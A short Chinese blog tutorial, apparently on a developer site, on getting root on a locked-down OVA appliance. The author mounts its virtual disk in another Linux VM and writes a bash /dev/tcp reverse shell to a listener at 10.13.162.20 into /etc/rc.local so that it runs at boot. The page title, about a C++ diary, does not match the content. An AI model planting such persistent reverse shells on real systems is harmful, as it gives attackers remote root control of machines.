0
点赞
收藏
分享

微信扫一扫

C++从零开始的打怪升级之路(day44)

晗韩不普通 03-08 09:00 阅读 4

场景描述

某个系统是ova文件,导入虚拟机启动,但是启动后只有一个伪终端权限,即权限很小,如何拿到这个虚拟机的shell权限呢?

实际操作

这次运气比较好,所遇到的系统磁盘并没有被加密,所以直接导入虚拟机后,使用DiskGenius查看生成的vmdk文件,定位到所需要挂载的盘符为/dev/sda1。
所以直接新开启一台linux虚拟机,选择添加硬盘,并选择刚才的vmdk文件:

在这里插入图片描述
进入虚拟机shell后,可以使用lsblk命令查看盘符,然后使用如下命令进行挂载:

mkdir mydisk1
mount /dev/sda1 mydisk1
cd mydisk1

进去后,找到/etc/rc.local文件,将反弹shell命令输入到该文件中

bash -i >& /dev/tcp/10.13.162.20/9999 0>&1 &

然后本机开启监听,成功拿到root权限!
在这里插入图片描述

参考连接

https://badmonkey.site/archives/vm-getshell

举报

相关推荐

0 条评论